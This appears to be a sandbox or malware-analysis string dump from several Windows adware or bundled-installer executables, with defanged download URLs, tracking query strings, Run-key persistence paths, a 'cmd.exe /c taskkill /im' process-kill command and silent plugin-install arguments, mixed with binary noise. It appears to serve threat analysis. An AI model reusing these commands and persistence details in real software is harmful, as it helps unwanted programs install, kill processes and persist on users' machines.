\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\OutputFile.cpp
\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\OutputFile.cpp
%s, %d
%s, %d
%s, length = %I64d err = %d
%s, length = %I64d err = %d
COutputFile::WriteData(%I64d, %d)
COutputFile::WriteData(%I64d, %d)
d:d:d:d
d:d:d:d
File: %s
File: %s
Line:%d
Line:%d
Cond: ASSERT( %s );
Cond: ASSERT( %s );
Condition: ASSERT( %s );
Condition: ASSERT( %s );
SourceFile: %s
SourceFile: %s
LineNum: %d
LineNum: %d
COMCTL32.DLL
COMCTL32.DLL
hhctrl.ocx
hhctrl.ocx
commctrl_DragListMsg
commctrl_DragListMsg
CCmdTarget
CCmdTarget
CNotSupportedException
CNotSupportedException
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
%s.dll
%s.dll
CHttpConnection
CHttpConnection
CHttpFile
CHttpFile
hXXp://
hXXp://
WININET.DLL
WININET.DLL
HTTP/1.0
HTTP/1.0
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
user32.dll
user32.dll
ole32.dll
ole32.dll
mscoree.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
Please contact the application's support team for more information.
GetProcessWindowStation
GetProcessWindowStation
OLEACC.dll
OLEACC.dll
f:\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\GuaGuaShow\GuaGuaRelease\SetupTool.pdb
f:\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\GuaGuaShow\GuaGuaRelease\SetupTool.pdb
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
comdlg32.dll
comdlg32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
UrlUnescapeA
UrlUnescapeA
SHLWAPI.dll
SHLWAPI.dll
oledlg.dll
oledlg.dll
OLEAUT32.dll
OLEAUT32.dll
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
GdipSetImageAttributesColorKeys
GdipSetImageAttributesColorKeys
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
WS2_32.dll
WS2_32.dll
.PAVCObject@@
.PAVCObject@@
.PAVCException@@
.PAVCException@@
.PAVCINETException@@
.PAVCINETException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
zcÃ
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\log\20140817 052007.log
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\log\20140817 052007.log
05:20:20:819
05:20:20:819
LastImage hXXp://img001.com/tg_pic/mobo14-1-9.png
LastImage hXXp://img001.com/tg_pic/mobo14-1-9.png
ame=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid= Result [1, 200]
ame=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid= Result [1, 200]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\guagua_77150006814.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\guagua_77150006814.exe
(*?@@?*&
(*?@@?*&
%.CC5!
%.CC5!
a%f#hA
a%f#hA
?%C;%
?%C;%
4.Rh5|
4.Rh5|
\^.ao
\^.ao
V%Fhb>
V%Fhb>
bPPn-k%%D*
bPPn-k%%D*
Aj.HM
Aj.HM
o.LM%
o.LM%
|%<.vyns>
|%<.vyns>
C%UQf*u
C%UQf*u
.CAQA
.CAQA
HM%FWP,
HM%FWP,
am.HM
am.HM
H
H
K5H.umE5
K5H.umE5
4]mn.znpdd
4]mn.znpdd
MD.pl
MD.pl
U]%s^
U]%s^
Jt.MS
Jt.MS
KAr%s
KAr%s
l.QfV
l.QfV
8HÃ…c
8HÃ…c
lx\/`ckc#u.sQsxE
lx\/`ckc#u.sQsxE
.XB=8
.XB=8
%x$4/
%x$4/
.WF5l
.WF5l
.Oae(
.Oae(
7i%u0
7i%u0
version="1.0.0.0"
version="1.0.0.0"
accKeyboardShortcut
accKeyboardShortcut
1.1.0.0
1.1.0.0
GirlShow.exe
GirlShow.exe
All Files (*.*)
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Access to %1 was denied..An invalid file handle was associated with %1.
Access to %1 was denied..An invalid file handle was associated with %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Ainqngz5.2.exe_1136:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
"44)*612
"44)*612
urlww
urlww
.FlGc
.FlGc
%smzCz
%smzCz
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
#vb6chs.dll
#vb6chs.dll
ieframe.dll
ieframe.dll
WebBrowser
WebBrowser
%Program Files%\VB
%Program Files%\VB
\VB6.OLB
\VB6.OLB
C:\Windows\System32\mshtml.tlb
C:\Windows\System32\mshtml.tlb
winmm.dll
winmm.dll
C:\Windows\System32\ieframe.oca
C:\Windows\System32\ieframe.oca
advapi32.dll
advapi32.dll
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
wininet.dll
wininet.dll
InternetOpenUrlA
InternetOpenUrlA
GetUrlSource
GetUrlSource
VBA6.DLL
VBA6.DLL
sUrl
sUrl
v.baofeng.com
v.baofeng.com
99999999999
99999999999
hXXp://order.5bo.com/
hXXp://order.5bo.com/
hXXp://wpa.qq.com
hXXp://wpa.qq.com
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
hXXp://hzf.v.baofeng.com/#
hXXp://hzf.v.baofeng.com/#
hXXp://hzf.v.baofeng.com/
hXXp://hzf.v.baofeng.com/
"url":"
"url":"
"swfurl":"
"swfurl":"
hXXp://
hXXp://
hXXp://tv.aiqingzhihui.com/zhibo2.html?id=
hXXp://tv.aiqingzhihui.com/zhibo2.html?id=
\setings.ini
\setings.ini
candid.exe
candid.exe
cmd.exe /c taskkill /im
cmd.exe /c taskkill /im
qq.com
qq.com
hXXp://tv.aiqingzhihui.com/zhibo2.html
hXXp://tv.aiqingzhihui.com/zhibo2.html
hXXp://y.qq.com/player
hXXp://y.qq.com/player
pptv.com
pptv.com
sohu.com
sohu.com
56.com
56.com
ifeng.com
ifeng.com
youku.com
youku.com
ku6.com
ku6.com
tudou.com
tudou.com
cntv.cn
cntv.cn
iqiyi.com
iqiyi.com
wasu.cn
wasu.cn
pps.tv
pps.tv
letv.com
letv.com
imgo.tv
imgo.tv
kankan.com
kankan.com
sina.com.cn
sina.com.cn
m1905.com
m1905.com
hz.letv.com
hz.letv.com
tv.sohu.com
tv.sohu.com
baofeng.com
baofeng.com
Ainqngz4.7.exe
Ainqngz4.7.exe
candid.exe_1548:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
[11
[11
[:>
[:>
y%D:To
y%D:To
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
#vb6chs.dll
#vb6chs.dll
ieframe.dll
ieframe.dll
WebBrowser
WebBrowser
%Program Files%\VB
%Program Files%\VB
\VB6.OLB
\VB6.OLB
]! 2C:\Windows\System32\ieframe.oca
]! 2C:\Windows\System32\ieframe.oca
C:\Windows\System32\mshtml.tlb
C:\Windows\System32\mshtml.tlb
winmm.dll
winmm.dll
VBA6.DLL
VBA6.DLL
RegCreateKeyA
RegCreateKeyA
advapi32.dll
advapi32.dll
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
wininet.dll
wininet.dll
InternetOpenUrlA
InternetOpenUrlA
GetUrlSource
GetUrlSource
C:\Windows\system32\msvbvm60.dll\3
C:\Windows\system32\msvbvm60.dll\3
NotifyMsgBox
NotifyMsgBox
user32.dll
user32.dll
oleaut32.dll
oleaut32.dll
kernel32.dll
kernel32.dll
WebBrowser2
WebBrowser2
WebBrowser1
WebBrowser1
0123210
0123210
)o4.tr
)o4.tr
sUrl
sUrl
\Ainqngz5.2.exe
\Ainqngz5.2.exe
\setings.ini
\setings.ini
\Ainqngz4.0.exe
\Ainqngz4.0.exe
hXXp://aimini.aiqingzhihui.com/ta2/?flag=
hXXp://aimini.aiqingzhihui.com/ta2/?flag=
hXXp://aimini.aiqingzhihui.com/ta3/?flag=
hXXp://aimini.aiqingzhihui.com/ta3/?flag=
hXXp://aitime.aiqingzhihui.com/newh1/?
hXXp://aitime.aiqingzhihui.com/newh1/?
hXXp://aitime.aiqingzhihui.com/newh2/?2
hXXp://aitime.aiqingzhihui.com/newh2/?2
hXXp://aitime.aiqingzhihui.com/newh3/?3
hXXp://aitime.aiqingzhihui.com/newh3/?3
hXXp://aimini.aiqingzhihui.com/new/?
hXXp://aimini.aiqingzhihui.com/new/?
hXXp://aimini.aiqingzhihui.com/new/?2
hXXp://aimini.aiqingzhihui.com/new/?2
hXXp://aimini.aiqingzhihui.com/ta1/?flag=
hXXp://aimini.aiqingzhihui.com/ta1/?flag=
Ainqngz5.2.exe
Ainqngz5.2.exe
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
cmd.exe /c taskkill /im
cmd.exe /c taskkill /im
hXXp://aimini.aiqingzhihui.com/new/?flag=
hXXp://aimini.aiqingzhihui.com/new/?flag=
hXXp://aitime.aiqingzhihui.com/dnewh1/?flag=
hXXp://aitime.aiqingzhihui.com/dnewh1/?flag=
hXXp://aitime.aiqingzhihui.com/dnewh2/?flag=
hXXp://aitime.aiqingzhihui.com/dnewh2/?flag=
hXXp://aitime.aiqingzhihui.com/dnewh3/?flag=
hXXp://aitime.aiqingzhihui.com/dnewh3/?flag=
hXXp://aitime.aiqingzhihui.com/newh1/?flag=
hXXp://aitime.aiqingzhihui.com/newh1/?flag=
hXXp://aitime.aiqingzhihui.com/newh2/?flag=
hXXp://aitime.aiqingzhihui.com/newh2/?flag=
hXXp://aitime.aiqingzhihui.com/newh3/?flag=
hXXp://aitime.aiqingzhihui.com/newh3/?flag=
hXXp:///
hXXp:///
kinetic.exe
kinetic.exe
BaiduAnSvc.exe_3884:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
T$xRSSh
T$xRSSh
;9u.SWj
;9u.SWj
8.uwS
8.uwS
n<.ut>
n<.ut>
..\src\google\protobuf\message_lite.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
%d.%d.%d
%d.%d.%d
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\stubs\common.cc
CHECK failed: (from.GetDescriptor()) == (descriptor):
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\descriptor.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
". To use it here, please add the necessary import.
", which is not imported by "
", which is not imported by "
$0$1 = $2
$0$1 = $2
$0$1 $2 $3 = $4
$0$1 $2 $3 = $4
.PLACEHOLDER_VALUE
.PLACEHOLDER_VALUE
.placeholder.proto
.placeholder.proto
map key must name a scalar or string field.
map key must name a scalar or string field.
map_key must not name a repeated field.
map_key must not name a repeated field.
CHECK failed: dynamic.get() != NULL:
CHECK failed: dynamic.get() != NULL:
.foo = value".
.foo = value".
.dummy
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
CHECK failed: !out.HadError():
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
" is repeated. Repeated options are not supported.
Import "
Import "
Missing field: FileDescriptorProto.name.
Missing field: FileDescriptorProto.name.
File recursively imports itself:
File recursively imports itself:
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
\xx
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\extension_set.cc
..\src\google\protobuf\extension_set.cc
CHECK failed: iter != extensions_.end():
CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
..\src\google\protobuf\extension_set_heavy.cc
..\src\google\protobuf\descriptor.pb.cc
..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\descriptor_database.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h
config_service.proto
config_service.proto
.\BDMConfig\Protocol\config_service.pb.cc
.\BDMConfig\Protocol\config_service.pb.cc
config_service.proto"(
config_service.proto"(
cmd_list
cmd_list
.ConfigItem"@
.ConfigItem"@
.ResultSet
.ResultSet
Content-Length:%d
Content-Length:%d
s.x.baidu.com
s.x.baidu.com
c:\clientci\workspace\bdm_v2.3fix_compile\main_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdm_v2.3fix_compile\main_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
.\update.pb.cc
%s:%u
%s:%u
1.0.0.1
1.0.0.1
.\header.pb.cc
.\header.pb.cc
%u.%u.%u.%u
%u.%u.%u.%u
addr %s not good...
addr %s not good...
Unsupported Media Type
Unsupported Media Type
HTTP Version not supported
HTTP Version not supported
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
https
https
ftpes
ftpes
ftps
ftps
tftp
tftp
% ;?:@=&,$/-_!.~*()
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
c:\clientci\workspace\bdm_v2.3fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb
c:\clientci\workspace\bdm_v2.3fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDLogicUtils.dll
?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z
?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z
BDMBase.dll
BDMBase.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
BDMFrameWork.dll
BDMStringUtils.dll
BDMStringUtils.dll
?BDMMsgGetModule@@YGJPAPAX@Z
?BDMMsgGetModule@@YGJPAPAX@Z
BDMMsg.dll
BDMMsg.dll
BDMSkin.dll
BDMSkin.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
MSVCP80.dll
MSVCP80.dll
PSAPI.DLL
PSAPI.DLL
WS2_32.dll
WS2_32.dll
SHLWAPI.dll
SHLWAPI.dll
MSVCR80.dll
MSVCR80.dll
_amsg_exit
_amsg_exit
_crt_debugger_hook
_crt_debugger_hook
USERENV.dll
USERENV.dll
WTSAPI32.dll
WTSAPI32.dll
HttpSendRequestW
HttpSendRequestW
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
NETAPI32.dll
NETAPI32.dll
BDMTinyXml.dll
BDMTinyXml.dll
RegOpenKeyExA
RegOpenKeyExA
BaiduAnSvc.exe
BaiduAnSvc.exe
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AVCRtpPluginContainer@@
.?AVCRtpPluginContainer@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AVCRTPServer@@
.?AVCRTPServer@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVCCmdPluginLauncher@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVCExePluginLauncher@@
.?AVIPluginCmdExecutor@@
.?AVIPluginCmdExecutor@@
.?AUPluginInfoPassiveSaver@@
.?AUPluginInfoPassiveSaver@@
.?AVheader@http@bena@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
.?AVrequest@http@bena@@
ÿF=
ÿF=
5%6s6
5%6s6
7 828=8{8
7 828=8{8
;'
;'
4%5X5b5w5
4%5X5b5w5
8!8'8-838
8!8'8-838
050=0"151
050=0"151
9!:4:]:|:
9!:4:]:|:
5h6D6~6s7
5h6D6~6s7
2%3U3
2%3U3
2&2-2:2?2
2&2-2:2?2
> >$>(>,>0>4>8>
> >$>(>,>0>4>8>
4 4$4(4,40444]4
4 4$4(4,40444]4
5"6 656]6
5"6 656]6
1$2-23292
1$2-23292
8%9U9z9
8%9U9z9
0%0U0u0
0%0U0u0
5 5$5(5,5054585
5 5$5(5,5054585
9 9$9(9,9094989
9 9$9(9,9094989
1 1$1(1,10181|1
1 1$1(1,10181|1
\PluginSetup.xml
\PluginSetup.xml
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
BDMDownload.dll
BDMDownload.dll
PackCache.xml
PackCache.xml
##cmd:
##cmd:
UninstalledPlugins.xml
UninstalledPlugins.xml
%d.%d
%d.%d
\GlobalPluginInfo.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\LocalPluginInfo.xml
\HotPlugins.xml
\HotPlugins.xml
\HotPlugin.bnr
\HotPlugin.bnr
PluginSetup.xml
PluginSetup.xml
explorer.exe
explorer.exe
winlogon.exe
winlogon.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
ntdll.dll
ntdll.dll
BaiduAnTray.exe
BaiduAnTray.exe
"{0}\{1}" {2}
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
EXPLORER.EXE
EXPLORER.EXE
BaiduAn.exe
BaiduAn.exe
BaiduAnUpdate.exe
BaiduAnUpdate.exe
BaiduAnBugRpt.exe
BaiduAnBugRpt.exe
Global\BDMMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
Global\BDMMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
BDAFileHelper.exe
BDAFileHelper.exe
Global\BDMEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
Global\BDMEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
BDALeakfixer.exe
BDALeakfixer.exe
Global\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
Global\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
BDASoftmgr.exe
BDASoftmgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
\RTPPlugins\RtpContainerConfig.xml
\RTPPlugins\RtpContainerConfig.xml
C:\test.exe
C:\test.exe
d-d-d d:d:d d
d-d-d d:d:d d
d:d:d
d:d:d
%s(%d)
%s(%d)
Last Error : %u(%s)
Last Error : %u(%s)
Global\BDMMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
Global\BDMMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
BDMNet.dll
BDMNet.dll
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
BDMUpdate.dll
.bdtmp
.bdtmp
.old_
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
kernel32.dll
kernel32.dll
\Global.db
\Global.db
Diphlpapi.dll
Diphlpapi.dll
D\\.\PhysicalDrive%d
D\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
2.3.0.2224
2.3.0.2224
BaiduanSvc.exe
BaiduanSvc.exe
yymusic05.exe_2308:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
u.jAh
